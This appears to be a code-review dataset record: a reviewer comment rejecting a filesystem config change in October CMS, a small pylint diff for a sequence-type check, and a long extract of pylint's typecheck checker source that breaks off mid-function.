$uploadsFolder . '/public/'; } return $uploadsFolder . '/protected/'; } /** * Returns the storage disk the file is stored on * @return FilesystemAdapter */ public function getDisk() { return Storage::disk(Config::get('cms.storage.uploads.disk')); } }
1
19,478
Isn't the better option to actually do `$this->getDisk()->url($uploadsPath)` without changing the filesystems config? Not sure why you think that change is required but it's definitely not getting merged.
octobercms-october
php
@@ -1585,7 +1585,7 @@ accessed. Python regular expressions are accepted.", not isinstance(itemmethod, nodes.FunctionDef) or itemmethod.root().name != "builtins" or not itemmethod.parent - or itemmethod.parent.name not in SEQUENCE_TYPES + or itemmethod.parent.frame().name not in SEQUENCE_TYPES ): return None
1
# Copyright (c) 2006-2014 LOGILAB S.A. (Paris, FRANCE) <[email protected]> # Copyright (c) 2009 James Lingard <[email protected]> # Copyright (c) 2012-2014 Google, Inc. # Copyright (c) 2014-2020 Claudiu Popa <[email protected]> # Copyright (c) 2014 David Shea <[email protected]> # Copyright (c) 2014 Steven Myint <[email protected]> # Copyright (c) 2014 Holger Peters <[email protected]> # Copyright (c) 2014 Arun Persaud <[email protected]> # Copyright (c) 2015 Anentropic <[email protected]> # Copyright (c) 2015 Dmitry Pribysh <[email protected]> # Copyright (c) 2015 Rene Zhang <[email protected]> # Copyright (c) 2015 Radu Ciorba <[email protected]> # Copyright (c) 2015 Ionel Cristian Maries <[email protected]> # Copyright (c) 2016, 2019 Ashley Whetter <[email protected]> # Copyright (c) 2016 Alexander Todorov <[email protected]> # Copyright (c) 2016 Jürgen Hermann <[email protected]> # Copyright (c) 2016 Jakub Wilk <[email protected]> # Copyright (c) 2016 Filipe Brandenburger <[email protected]> # Copyright (c) 2017, 2021 Ville Skyttä <[email protected]> # Copyright (c) 2017-2018, 2020 hippo91 <[email protected]> # Copyright (c) 2017 Łukasz Rogalski <[email protected]> # Copyright (c) 2017 Derek Gustafson <[email protected]> # Copyright (c) 2018-2019, 2021 Nick Drozd <[email protected]> # Copyright (c) 2018 Pablo Galindo <[email protected]> # Copyright (c) 2018 Jim Robertson <[email protected]> # Copyright (c) 2018 Lucas Cimon <[email protected]> # Copyright (c) 2018 Mike Frysinger <[email protected]> # Copyright (c) 2018 Ben Green <[email protected]> # Copyright (c) 2018 Konstantin <[email protected]> # Copyright (c) 2018 Justin Li <[email protected]> # Copyright (c) 2018 Bryce Guinta <[email protected]> # Copyright (c) 2019-2021 Pierre Sassoulas <[email protected]> # Copyright (c) 2019 Andy Palmer <[email protected]> # Copyright (c) 2019 mattlbeck <[email protected]> # Copyright (c) 2019 Martin Vielsmaier <[email protected]> # Copyright (c) 2019 Santiago Castro <[email protected]> # Copyright (c) 2019 yory8 <[email protected]> # Copyright (c) 2019 Federico Bond <[email protected]> # Copyright (c) 2019 Pascal Corpet <[email protected]> # Copyright (c) 2020 Peter Kolbus <[email protected]> # Copyright (c) 2020 Julien Palard <[email protected]> # Copyright (c) 2020 Ram Rachum <[email protected]> # Copyright (c) 2020 Anthony Sottile <[email protected]> # Copyright (c) 2020 Anubhav <[email protected]> # Copyright (c) 2021 Marc Mueller <[email protected]> # Copyright (c) 2021 Tushar Sadhwani <[email protected]> # Copyright (c) 2021 Daniël van Noord <[email protected]> # Copyright (c) 2021 David Liu <[email protected]> # Copyright (c) 2021 doranid <[email protected]> # Copyright (c) 2021 Yu Shao, Pang <[email protected]> # Copyright (c) 2021 Andrew Haigh <[email protected]> # Copyright (c) 2021 Jens H. Nielsen <[email protected]> # Copyright (c) 2021 Ikraduya Edian <[email protected]> # Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html # For details: https://github.com/PyCQA/pylint/blob/main/LICENSE """try to find more bugs in the code using astroid inference capabilities""" import fnmatch import heapq import itertools import operator import re import shlex import sys import types from collections import deque from collections.abc import Sequence from functools import singledispatch from typing import ( TYPE_CHECKING, Any, Callable, Iterator, List, Optional, Pattern, Tuple, Union, ) import astroid import astroid.exceptions from astroid import bases, nodes from pylint.checkers import BaseChecker, utils from pylint.checkers.utils import ( check_messages, decorated_with, decorated_with_property, has_known_bases, is_builtin_object, is_classdef_type, is_comprehension, is_inside_abstract_class, is_iterable, is_mapping, is_overload_stub, is_postponed_evaluation_enabled, is_super, node_ignores_exception, safe_infer, supports_delitem, supports_getitem, supports_membership_test, supports_setitem, ) from pylint.interfaces import INFERENCE, IAstroidChecker from pylint.utils import get_global_option if TYPE_CHECKING: from pylint.lint import PyLinter CallableObjects = Union[ bases.BoundMethod, bases.UnboundMethod, nodes.FunctionDef, nodes.Lambda, nodes.ClassDef, ] STR_FORMAT = {"builtins.str.format"} ASYNCIO_COROUTINE = "asyncio.coroutines.coroutine" BUILTIN_TUPLE = "builtins.tuple" TYPE_ANNOTATION_NODES_TYPES = ( nodes.AnnAssign, nodes.Arguments, nodes.FunctionDef, ) def _unflatten(iterable): for index, elem in enumerate(iterable): if isinstance(elem, Sequence) and not isinstance(elem, str): yield from _unflatten(elem) elif elem and not index: # We're interested only in the first element. yield elem def _flatten_container(iterable): # Flatten nested containers into a single iterable for item in iterable: if isinstance(item, (list, tuple, types.GeneratorType)): yield from _flatten_container(item) else: yield item def _is_owner_ignored(owner, attrname, ignored_classes, ignored_modules): """Check if the given owner should be ignored This will verify if the owner's module is in *ignored_modules* or the owner's module fully qualified name is in *ignored_modules* or if the *ignored_modules* contains a pattern which catches the fully qualified name of the module. Also, similar checks are done for the owner itself, if its name matches any name from the *ignored_classes* or if its qualified name can be found in *ignored_classes*. """ ignored_modules = set(ignored_modules) module_name = owner.root().name module_qname = owner.root().qname() for ignore in ignored_modules: # Try to match the module name / fully qualified name directly if module_qname in ignored_modules or module_name in ignored_modules: return True # Try to see if the ignores pattern match against the module name. if fnmatch.fnmatch(module_qname, ignore): return True # Otherwise, we might have a root module name being ignored, # and the qualified owner has more levels of depth. parts = deque(module_name.split(".")) current_module = "" while parts: part = parts.popleft() if not current_module: current_module = part else: current_module += f".{part}" if current_module in ignored_modules: return True # Match against ignored classes. ignored_classes = set(ignored_classes) qname = owner.qname() if hasattr(owner, "qname") else "" return any(ignore in (attrname, qname) for ignore in ignored_classes) @singledispatch def _node_names(node): if not hasattr(node, "locals"): return [] return node.locals.keys() @_node_names.register(nodes.ClassDef) @_node_names.register(astroid.Instance) def _(node): values = itertools.chain(node.instance_attrs.keys(), node.locals.keys()) try: mro = node.mro()[1:] except (NotImplementedError, TypeError, astroid.MroError): mro = node.ancestors() other_values = [value for cls in mro for value in _node_names(cls)] return itertools.chain(values, other_values) def _string_distance(seq1, seq2): seq2_length = len(seq2) row = list(range(1, seq2_length + 1)) + [0] for seq1_index, seq1_char in enumerate(seq1): last_row = row row = [0] * seq2_length + [seq1_index + 1] for seq2_index, seq2_char in enumerate(seq2): row[seq2_index] = min( last_row[seq2_index] + 1, row[seq2_index - 1] + 1, last_row[seq2_index - 1] + (seq1_char != seq2_char), ) return row[seq2_length - 1] def _similar_names(owner, attrname, distance_threshold, max_choices): """Given an owner and a name, try to find similar names The similar names are searched given a distance metric and only a given number of choices will be returned. """ possible_names = [] names = _node_names(owner) for name in names: if name == attrname: continue distance = _string_distance(attrname, name) if distance <= distance_threshold: possible_names.append((name, distance)) # Now get back the values with a minimum, up to the given # limit or choices. picked = [ name for (name, _) in heapq.nsmallest( max_choices, possible_names, key=operator.itemgetter(1) ) ] return sorted(picked) def _missing_member_hint(owner, attrname, distance_threshold, max_choices): names = _similar_names(owner, attrname, distance_threshold, max_choices) if not names: # No similar name. return "" names = [repr(name) for name in names] if len(names) == 1: names = ", ".join(names) else: names = f"one of {', '.join(names[:-1])} or {names[-1]}" return f"; maybe {names}?" MSGS = { "E1101": ( "%s %r has no %r member%s", "no-member", "Used when a variable is accessed for an unexistent member.", {"old_names": [("E1103", "maybe-no-member")]}, ), "I1101": ( "%s %r has no %r member%s, but source is unavailable. Consider " "adding this module to extension-pkg-allow-list if you want " "to perform analysis based on run-time introspection of living objects.", "c-extension-no-member", "Used when a variable is accessed for non-existent member of C " "extension. Due to unavailability of source static analysis is impossible, " "but it may be performed by introspecting living objects in run-time.", ), "E1102": ( "%s is not callable", "not-callable", "Used when an object being called has been inferred to a non " "callable object.", ), "E1111": ( "Assigning result of a function call, where the function has no return", "assignment-from-no-return", "Used when an assignment is done on a function call but the " "inferred function doesn't return anything.", ), "E1120": ( "No value for argument %s in %s call", "no-value-for-parameter", "Used when a function call passes too few arguments.", ), "E1121": ( "Too many positional arguments for %s call", "too-many-function-args", "Used when a function call passes too many positional arguments.", ), "E1123": ( "Unexpected keyword argument %r in %s call", "unexpected-keyword-arg", "Used when a function call passes a keyword argument that " "doesn't correspond to one of the function's parameter names.", ), "E1124": ( "Argument %r passed by position and keyword in %s call", "redundant-keyword-arg", "Used when a function call would result in assigning multiple " "values to a function parameter, one value from a positional " "argument and one from a keyword argument.", ), "E1125": ( "Missing mandatory keyword argument %r in %s call", "missing-kwoa", ( "Used when a function call does not pass a mandatory" " keyword-only argument." ), ), "E1126": ( "Sequence index is not an int, slice, or instance with __index__", "invalid-sequence-index", "Used when a sequence type is indexed with an invalid type. " "Valid types are ints, slices, and objects with an __index__ " "method.", ), "E1127": ( "Slice index is not an int, None, or instance with __index__", "invalid-slice-index", "Used when a slice index is not an integer, None, or an object " "with an __index__ method.", ), "E1128": ( "Assigning result of a function call, where the function returns None", "assignment-from-none", "Used when an assignment is done on a function call but the " "inferred function returns nothing but None.", {"old_names": [("W1111", "old-assignment-from-none")]}, ), "E1129": ( "Context manager '%s' doesn't implement __enter__ and __exit__.", "not-context-manager", "Used when an instance in a with statement doesn't implement " "the context manager protocol(__enter__/__exit__).", ), "E1130": ( "%s", "invalid-unary-operand-type", "Emitted when a unary operand is used on an object which does not " "support this type of operation.", ), "E1131": ( "%s", "unsupported-binary-operation", "Emitted when a binary arithmetic operation between two " "operands is not supported.", ), "E1132": ( "Got multiple values for keyword argument %r in function call", "repeated-keyword", "Emitted when a function call got multiple values for a keyword.", ), "E1135": ( "Value '%s' doesn't support membership test", "unsupported-membership-test", "Emitted when an instance in membership test expression doesn't " "implement membership protocol (__contains__/__iter__/__getitem__).", ), "E1136": ( "Value '%s' is unsubscriptable", "unsubscriptable-object", "Emitted when a subscripted value doesn't support subscription " "(i.e. doesn't define __getitem__ method or __class_getitem__ for a class).", ), "E1137": ( "%r does not support item assignment", "unsupported-assignment-operation", "Emitted when an object does not support item assignment " "(i.e. doesn't define __setitem__ method).", ), "E1138": ( "%r does not support item deletion", "unsupported-delete-operation", "Emitted when an object does not support item deletion " "(i.e. doesn't define __delitem__ method).", ), "E1139": ( "Invalid metaclass %r used", "invalid-metaclass", "Emitted whenever we can detect that a class is using, " "as a metaclass, something which might be invalid for using as " "a metaclass.", ), "E1140": ( "Dict key is unhashable", "unhashable-dict-key", "Emitted when a dict key is not hashable " "(i.e. doesn't define __hash__ method).", ), "E1141": ( "Unpacking a dictionary in iteration without calling .items()", "dict-iter-missing-items", "Emitted when trying to iterate through a dict without calling .items()", ), "E1142": ( "'await' should be used within an async function", "await-outside-async", "Emitted when await is used outside an async function.", ), "W1113": ( "Keyword argument before variable positional arguments list " "in the definition of %s function", "keyword-arg-before-vararg", "When defining a keyword argument before variable positional arguments, one can " "end up in having multiple values passed for the aforementioned parameter in " "case the method is called with keyword arguments.", ), "W1114": ( "Positional arguments appear to be out of order", "arguments-out-of-order", "Emitted when the caller's argument names fully match the parameter " "names in the function signature but do not have the same order.", ), "W1115": ( "Non-string value assigned to __name__", "non-str-assignment-to-dunder-name", "Emitted when a non-string value is assigned to __name__", ), "W1116": ( "Second argument of isinstance is not a type", "isinstance-second-argument-not-valid-type", "Emitted when the second argument of an isinstance call is not a type.", ), } # builtin sequence types in Python 2 and 3. SEQUENCE_TYPES = { "str", "unicode", "list", "tuple", "bytearray", "xrange", "range", "bytes", "memoryview", } def _emit_no_member( node, owner, owner_name, mixin_class_rgx: Pattern[str], ignored_mixins=True, ignored_none=True, ): """Try to see if no-member should be emitted for the given owner. The following cases are ignored: * the owner is a function and it has decorators. * the owner is an instance and it has __getattr__, __getattribute__ implemented * the module is explicitly ignored from no-member checks * the owner is a class and the name can be found in its metaclass. * The access node is protected by an except handler, which handles AttributeError, Exception or bare except. * The node is guarded behind and `IF` or `IFExp` node """ # pylint: disable=too-many-return-statements if node_ignores_exception(node, AttributeError): return False if ignored_none and isinstance(owner, nodes.Const) and owner.value is None: return False if is_super(owner) or getattr(owner, "type", None) == "metaclass": return False if owner_name and ignored_mixins and mixin_class_rgx.match(owner_name): return False if isinstance(owner, nodes.FunctionDef) and ( owner.decorators or owner.is_abstract() ): return False if isinstance(owner, (astroid.Instance, nodes.ClassDef)): if owner.has_dynamic_getattr(): # Issue #2565: Don't ignore enums, as they have a `__getattr__` but it's not # invoked at this point. try: metaclass = owner.metaclass() except astroid.MroError: return False if metaclass: # Renamed in Python 3.10 to `EnumType` return metaclass.qname() in {"enum.EnumMeta", "enum.EnumType"} return False if not has_known_bases(owner): return False # Exclude typed annotations, since these might actually exist # at some point during the runtime of the program. if utils.is_attribute_typed_annotation(owner, node.attrname): return False if isinstance(owner, astroid.objects.Super): # Verify if we are dealing with an invalid Super object. # If it is invalid, then there's no point in checking that # it has the required attribute. Also, don't fail if the # MRO is invalid. try: owner.super_mro() except (astroid.MroError, astroid.SuperError): return False if not all(has_known_bases(base) for base in owner.type.mro()): return False if isinstance(owner, nodes.Module): try: owner.getattr("__getattr__") return False except astroid.NotFoundError: pass if owner_name and node.attrname.startswith("_" + owner_name): # Test if an attribute has been mangled ('private' attribute) unmangled_name = node.attrname.split("_" + owner_name)[-1] try: if owner.getattr(unmangled_name, context=None) is not None: return False except astroid.NotFoundError: return True if ( owner.parent and isinstance(owner.parent, nodes.ClassDef) and owner.parent.name == "EnumMeta" and owner_name == "__members__" and node.attrname in {"items", "values", "keys"} ): # Avoid false positive on Enum.__members__.{items(), values, keys} # See https://github.com/PyCQA/pylint/issues/4123 return False # Don't emit no-member if guarded behind `IF` or `IFExp` # * Walk up recursively until if statement is found. # * Check if condition can be inferred as `Const`, # would evaluate as `False`, # and wheater the node is part of the `body`. # * Continue checking until scope of node is reached. scope: nodes.NodeNG = node.scope() node_origin: nodes.NodeNG = node parent: nodes.NodeNG = node.parent while parent != scope: if isinstance(parent, (nodes.If, nodes.IfExp)): inferred = safe_infer(parent.test) if ( # pylint: disable=too-many-boolean-expressions isinstance(inferred, nodes.Const) and inferred.bool_value() is False and ( isinstance(parent, nodes.If) and node_origin in parent.body or isinstance(parent, nodes.IfExp) and node_origin == parent.body ) ): return False node_origin, parent = parent, parent.parent return True def _determine_callable( callable_obj: nodes.NodeNG, ) -> Tuple[CallableObjects, int, str]: # pylint: disable=fixme # TODO: The typing of the second return variable is actually Literal[0,1] # We need typing on astroid.NodeNG.implicit_parameters for this # TODO: The typing of the third return variable can be narrowed to a Literal # We need typing on astroid.NodeNG.type for this # Ordering is important, since BoundMethod is a subclass of UnboundMethod, # and Function inherits Lambda. parameters = 0 if hasattr(callable_obj, "implicit_parameters"): parameters = callable_obj.implicit_parameters() if isinstance(callable_obj, bases.BoundMethod): # Bound methods have an extra implicit 'self' argument. return callable_obj, parameters, callable_obj.type if isinstance(callable_obj, bases.UnboundMethod): return callable_obj, parameters, "unbound method" if isinstance(callable_obj, nodes.FunctionDef): return callable_obj, parameters, callable_obj.type if isinstance(callable_obj, nodes.Lambda): return callable_obj, parameters, "lambda" if isinstance(callable_obj, nodes.ClassDef): # Class instantiation, lookup __new__ instead. # If we only find object.__new__, we can safely check __init__ # instead. If __new__ belongs to builtins, then we look # again for __init__ in the locals, since we won't have # argument information for the builtin __new__ function. try: # Use the last definition of __new__. new = callable_obj.local_attr("__new__")[-1] except astroid.NotFoundError: new = None from_object = new and new.parent.scope().name == "object" from_builtins = new and new.root().name in sys.builtin_module_names if not new or from_object or from_builtins: try: # Use the last definition of __init__. callable_obj = callable_obj.local_attr("__init__")[-1] except astroid.NotFoundError as e: # do nothing, covered by no-init. raise ValueError from e else: callable_obj = new if not isinstance(callable_obj, nodes.FunctionDef): raise ValueError # both have an extra implicit 'cls'/'self' argument. return callable_obj, parameters, "constructor" raise ValueError def _has_parent_of_type(node, node_type, statement): """Check if the given node has a parent of the given type.""" parent = node.parent while not isinstance(parent, node_type) and statement.parent_of(parent): parent = parent.parent return isinstance(parent, node_type) def _no_context_variadic_keywords(node, scope): statement = node.statement(future=True) variadics = () if isinstance(scope, nodes.Lambda) and not isinstance(scope, nodes.FunctionDef): variadics = list(node.keywords or []) + node.kwargs elif isinstance(statement, (nodes.Return, nodes.Expr, nodes.Assign)) and isinstance( statement.value, nodes.Call ): call = statement.value variadics = list(call.keywords or []) + call.kwargs return _no_context_variadic(node, scope.args.kwarg, nodes.Keyword, variadics) def _no_context_variadic_positional(node, scope): variadics = node.starargs + node.kwargs return _no_context_variadic(node, scope.args.vararg, nodes.Starred, variadics) def _no_context_variadic(node, variadic_name, variadic_type, variadics): """Verify if the given call node has variadic nodes without context This is a workaround for handling cases of nested call functions which don't have the specific call context at hand. Variadic arguments (variable positional arguments and variable keyword arguments) are inferred, inherently wrong, by astroid as a Tuple, respectively a Dict with empty elements. This can lead pylint to believe that a function call receives too few arguments. """ scope = node.scope() is_in_lambda_scope = not isinstance(scope, nodes.FunctionDef) and isinstance( scope, nodes.Lambda ) statement = node.statement(future=True) for name in statement.nodes_of_class(nodes.Name): if name.name != variadic_name: continue inferred = safe_infer(name) if isinstance(inferred, (nodes.List, nodes.Tuple)): length = len(inferred.elts) elif isinstance(inferred, nodes.Dict): length = len(inferred.items) else: continue if is_in_lambda_scope and isinstance(inferred.parent, nodes.Arguments): # The statement of the variadic will be the assignment itself, # so we need to go the lambda instead inferred_statement = inferred.parent.parent else: inferred_statement = inferred.statement(future=True) if not length and isinstance(inferred_statement, nodes.Lambda): is_in_starred_context = _has_parent_of_type(node, variadic_type, statement) used_as_starred_argument = any( variadic.value == name or variadic.value.parent_of(name) for variadic in variadics ) if is_in_starred_context or used_as_starred_argument: return True return False def _is_invalid_metaclass(metaclass): try: mro = metaclass.mro() except NotImplementedError: # Cannot have a metaclass which is not a newstyle class. return True else: if not any(is_builtin_object(cls) and cls.name == "type" for cls in mro): return True return False def _infer_from_metaclass_constructor(cls, func: nodes.FunctionDef): """Try to infer what the given *func* constructor is building :param astroid.FunctionDef func: A metaclass constructor. Metaclass definitions can be functions, which should accept three arguments, the name of the class, the bases of the class and the attributes. The function could return anything, but usually it should be a proper metaclass. :param astroid.ClassDef cls: The class for which the *func* parameter should generate a metaclass. :returns: The class generated by the function or None, if we couldn't infer it. :rtype: astroid.ClassDef """ context = astroid.context.InferenceContext() class_bases = nodes.List() class_bases.postinit(elts=cls.bases) attrs = nodes.Dict() local_names = [(name, values[-1]) for name, values in cls.locals.items()] attrs.postinit(local_names) builder_args = nodes.Tuple() builder_args.postinit([cls.name, class_bases, attrs]) context.callcontext = astroid.context.CallContext(builder_args) try: inferred = next(func.infer_call_result(func, context), None) except astroid.InferenceError: return None return inferred or None def _is_c_extension(module_node): return ( not astroid.modutils.is_standard_module(module_node.name) and not module_node.fully_defined() ) def _is_invalid_isinstance_type(arg): # Return True if we are sure that arg is not a type inferred = utils.safe_infer(arg) if not inferred: # Cannot infer it so skip it. return False if isinstance(inferred, nodes.Tuple): return any(_is_invalid_isinstance_type(elt) for elt in inferred.elts) if isinstance(inferred, nodes.ClassDef): return False if isinstance(inferred, astroid.Instance) and inferred.qname() == BUILTIN_TUPLE: return False return True class TypeChecker(BaseChecker): """try to find bugs in the code using type inference""" __implements__ = (IAstroidChecker,) # configuration section name name = "typecheck" # messages msgs = MSGS priority = -1 # configuration options options = ( ( "ignore-on-opaque-inference", { "default": True, "type": "yn", "metavar": "<y or n>", "help": "This flag controls whether pylint should warn about " "no-member and similar checks whenever an opaque object " "is returned when inferring. The inference can return " "multiple potential results while evaluating a Python object, " "but some branches might not be evaluated, which results in " "partial inference. In that case, it might be useful to still emit " "no-member and other checks for the rest of the inferred objects.", }, ), ( "mixin-class-rgx", { "default": ".*[Mm]ixin", "type": "regexp", "metavar": "<regexp>", "help": "Regex pattern to define which classes are considered mixins " "ignore-mixin-members is set to 'yes'", }, ), ( "ignore-mixin-members", { "default": True, "type": "yn", "metavar": "<y or n>", "help": "Tells whether missing members accessed in mixin " "class should be ignored. A class is considered mixin if its name matches " "the mixin-class-rgx option.", }, ), ( "ignore-none", { "default": True, "type": "yn", "metavar": "<y or n>", "help": "Tells whether to warn about missing members when the owner " "of the attribute is inferred to be None.", }, ), ( "ignored-modules", { "default": (), "type": "csv", "metavar": "<module names>", "help": "List of module names for which member attributes " "should not be checked (useful for modules/projects " "where namespaces are manipulated during runtime and " "thus existing member attributes cannot be " "deduced by static analysis). It supports qualified " "module names, as well as Unix pattern matching.", }, ), # the defaults here are *stdlib* names that (almost) always # lead to false positives, since their idiomatic use is # 'too dynamic' for pylint to grok. ( "ignored-classes", { "default": ("optparse.Values", "thread._local", "_thread._local"), "type": "csv", "metavar": "<members names>", "help": "List of class names for which member attributes " "should not be checked (useful for classes with " "dynamically set attributes). This supports " "the use of qualified names.", }, ), ( "generated-members", { "default": (), "type": "string", "metavar": "<members names>", "help": "List of members which are set dynamically and \ missed by pylint inference system, and so shouldn't trigger E1101 when \ accessed. Python regular expressions are accepted.", }, ), ( "contextmanager-decorators", { "default": ["contextlib.contextmanager"], "type": "csv", "metavar": "<decorator names>", "help": "List of decorators that produce context managers, " "such as contextlib.contextmanager. Add to this list " "to register other decorators that produce valid " "context managers.", }, ), ( "missing-member-hint-distance", { "default": 1, "type": "int", "metavar": "<member hint edit distance>", "help": "The minimum edit distance a name should have in order " "to be considered a similar match for a missing member name.", }, ), ( "missing-member-max-choices", { "default": 1, "type": "int", "metavar": "<member hint max choices>", "help": "The total number of similar names that should be taken in " "consideration when showing a hint for a missing member.", }, ), ( "missing-member-hint", { "default": True, "type": "yn", "metavar": "<missing member hint>", "help": "Show a hint with possible names when a member name was not " "found. The aspect of finding the hint is based on edit distance.", }, ), ( "signature-mutators", { "default": [], "type": "csv", "metavar": "<decorator names>", "help": "List of decorators that change the signature of " "a decorated function.", }, ), ) def open(self) -> None: py_version = get_global_option(self, "py-version") self._py310_plus = py_version >= (3, 10) self._mixin_class_rgx = get_global_option(self, "mixin-class-rgx") @astroid.decorators.cachedproperty def _suggestion_mode(self): return get_global_option(self, "suggestion-mode", default=True) @astroid.decorators.cachedproperty def _compiled_generated_members(self) -> Tuple[Pattern, ...]: # do this lazily since config not fully initialized in __init__ # generated_members may contain regular expressions # (surrounded by quote `"` and followed by a comma `,`) # REQUEST,aq_parent,"[a-zA-Z]+_set{1,2}"' => # ('REQUEST', 'aq_parent', '[a-zA-Z]+_set{1,2}') generated_members = self.config.generated_members if isinstance(generated_members, str): gen = shlex.shlex(generated_members) gen.whitespace += "," gen.wordchars += r"[]-+\.*?()|" generated_members = tuple(tok.strip('"') for tok in gen) return tuple(re.compile(exp) for exp in generated_members) @check_messages("keyword-arg-before-vararg") def visit_functiondef(self, node: nodes.FunctionDef) -> None: # check for keyword arg before varargs if node.args.vararg and node.args.defaults: self.add_message("keyword-arg-before-vararg", node=node, args=(node.name)) visit_asyncfunctiondef = visit_functiondef @check_messages("invalid-metaclass") def visit_classdef(self, node: nodes.ClassDef) -> None: def _metaclass_name(metaclass): # pylint: disable=unidiomatic-typecheck if isinstance(metaclass, (nodes.ClassDef, nodes.FunctionDef)): return metaclass.name if type(metaclass) is bases.Instance: # Really do mean type, not isinstance, since subclasses of bases.Instance # like Const or Dict should use metaclass.as_string below. return str(metaclass) return metaclass.as_string() metaclass = node.declared_metaclass() if not metaclass: return if isinstance(metaclass, nodes.FunctionDef): # Try to infer the result. metaclass = _infer_from_metaclass_constructor(node, metaclass) if not metaclass: # Don't do anything if we cannot infer the result. return if isinstance(metaclass, nodes.ClassDef): if _is_invalid_metaclass(metaclass): self.add_message( "invalid-metaclass", node=node, args=(_metaclass_name(metaclass),) ) else: self.add_message( "invalid-metaclass", node=node, args=(_metaclass_name(metaclass),) ) def visit_assignattr(self, node: nodes.AssignAttr) -> None: if isinstance(node.assign_type(), nodes.AugAssign): self.visit_attribute(node) def visit_delattr(self, node: nodes.DelAttr) -> None: self.visit_attribute(node) @check_messages("no-member", "c-extension-no-member") def visit_attribute(self, node: nodes.Attribute) -> None: """check that the accessed attribute exists to avoid too much false positives for now, we'll consider the code as correct if a single of the inferred nodes has the accessed attribute. function/method, super call and metaclasses are ignored """ if any( pattern.match(name) for name in (node.attrname, node.as_string()) for pattern in self._compiled_generated_members ): return try: inferred = list(node.expr.infer()) except astroid.InferenceError: return # list of (node, nodename) which are missing the attribute missingattr = set() non_opaque_inference_results = [ owner for owner in inferred if owner is not astroid.Uninferable and not isinstance(owner, nodes.Unknown) ] if ( len(non_opaque_inference_results) != len(inferred) and self.config.ignore_on_opaque_inference ): # There is an ambiguity in the inference. Since we can't # make sure that we won't emit a false positive, we just stop # whenever the inference returns an opaque inference object. return for owner in non_opaque_inference_results: name = getattr(owner, "name", None) if _is_owner_ignored( owner, name, self.config.ignored_classes, self.config.ignored_modules ): continue qualname = f"{owner.pytype()}.{node.attrname}" if any( pattern.match(qualname) for pattern in self._compiled_generated_members ): return try: if not [ n for n in owner.getattr(node.attrname) if not isinstance(n.statement(future=True), nodes.AugAssign) ]: missingattr.add((owner, name)) continue except astroid.exceptions.StatementMissing: continue except AttributeError: continue except astroid.DuplicateBasesError: continue except astroid.NotFoundError: # This can't be moved before the actual .getattr call, # because there can be more values inferred and we are # stopping after the first one which has the attribute in question. # The problem is that if the first one has the attribute, # but we continue to the next values which doesn't have the # attribute, then we'll have a false positive. # So call this only after the call has been made. if not _emit_no_member( node, owner, name, self._mixin_class_rgx, ignored_mixins=self.config.ignore_mixin_members, ignored_none=self.config.ignore_none, ): continue missingattr.add((owner, name)) continue # stop on the first found break else: # we have not found any node with the attributes, display the # message for inferred nodes done = set() for owner, name in missingattr: if isinstance(owner, astroid.Instance): actual = owner._proxied else: actual = owner if actual in done: continue done.add(actual) msg, hint = self._get_nomember_msgid_hint(node, owner) self.add_message( msg, node=node, args=(owner.display_type(), name, node.attrname, hint), confidence=INFERENCE, ) def _get_nomember_msgid_hint(self, node, owner): suggestions_are_possible = self._suggestion_mode and isinstance( owner, nodes.Module ) if suggestions_are_possible and _is_c_extension(owner): msg = "c-extension-no-member" hint = "" else: msg = "no-member" if self.config.missing_member_hint: hint = _missing_member_hint( owner, node.attrname, self.config.missing_member_hint_distance, self.config.missing_member_max_choices, ) else: hint = "" return msg, hint @check_messages( "assignment-from-no-return", "assignment-from-none", "non-str-assignment-to-dunder-name", ) def visit_assign(self, node: nodes.Assign) -> None: """Process assignments in the AST.""" self._check_assignment_from_function_call(node) self._check_dundername_is_string(node) def _check_assignment_from_function_call(self, node): """check that if assigning to a function call, the function is possibly returning something valuable """ if not isinstance(node.value, nodes.Call): return function_node = safe_infer(node.value.func) funcs = (nodes.FunctionDef, astroid.UnboundMethod, astroid.BoundMethod) if not isinstance(function_node, funcs): return # Unwrap to get the actual function object if isinstance(function_node, astroid.BoundMethod) and isinstance( function_node._proxied, astroid.UnboundMethod ): function_node = function_node._proxied._proxied # Make sure that it's a valid function that we can analyze. # Ordered from less expensive to more expensive checks. # pylint: disable=too-many-boolean-expressions if ( not function_node.is_function or isinstance(function_node, nodes.AsyncFunctionDef) or function_node.decorators or function_node.is_generator() or function_node.is_abstract(pass_is_abstract=False) or utils.is_error(function_node) or not function_node.root().fully_defined() ): return returns = list( function_node.nodes_of_class(nodes.Return, skip_klass=nodes.FunctionDef) ) if not returns: self.add_message("assignment-from-no-return", node=node) else: for rnode in returns: if not ( isinstance(rnode.value, nodes.Const) and rnode.value.value is None or rnode.value is None ): break else: self.add_message("assignment-from-none", node=node) def _check_dundername_is_string(self, node): """Check a string is assigned to self.__name__""" # Check the left-hand side of the assignment is <something>.__name__ lhs = node.targets[0] if not isinstance(lhs, nodes.AssignAttr): return if not lhs.attrname == "__name__": return # If the right-hand side is not a string rhs = node.value if isinstance(rhs, nodes.Const) and isinstance(rhs.value, str): return inferred = utils.safe_infer(rhs) if not inferred: return if not (isinstance(inferred, nodes.Const) and isinstance(inferred.value, str)): # Add the message self.add_message("non-str-assignment-to-dunder-name", node=node) def _check_uninferable_call(self, node): """Check that the given uninferable Call node does not call an actual function. """ if not isinstance(node.func, nodes.Attribute): return # Look for properties. First, obtain # the lhs of the Attribute node and search the attribute # there. If that attribute is a property or a subclass of properties, # then most likely it's not callable. expr = node.func.expr klass = safe_infer(expr) if ( klass is None or klass is astroid.Uninferable or not isinstance(klass, astroid.Instance) ): return try: attrs = klass._proxied.getattr(node.func.attrname) except astroid.NotFoundError: return for attr in attrs: if attr is astroid.Uninferable: continue if not isinstance(attr, nodes.FunctionDef): continue # Decorated, see if it is decorated with a property. # Also, check the returns and see if they are callable. if decorated_with_property(attr): try: all_returns_are_callable = all( return_node.callable() or return_node is astroid.Uninferable for return_node in attr.infer_call_result(node) ) except astroid.InferenceError: continue if not all_returns_are_callable: self.add_message( "not-callable", node=node, args=node.func.as_string() ) break def _check_argument_order(self, node, call_site, called, called_param_names): """Match the supplied argument names against the function parameters. Warn if some argument names are not in the same order as they are in the function signature. """ # Check for called function being an object instance function # If so, ignore the initial 'self' argument in the signature try: is_classdef = isinstance(called.parent, nodes.ClassDef) if is_classdef and called_param_names[0] == "self": called_param_names = called_param_names[1:] except IndexError: return try: # extract argument names, if they have names calling_parg_names = [p.name for p in call_site.positional_arguments] # Additionally, get names of keyword arguments to use in a full match # against parameters calling_kwarg_names = [ arg.name for arg in call_site.keyword_arguments.values() ] except AttributeError: # the type of arg does not provide a `.name`. In this case we # stop checking for 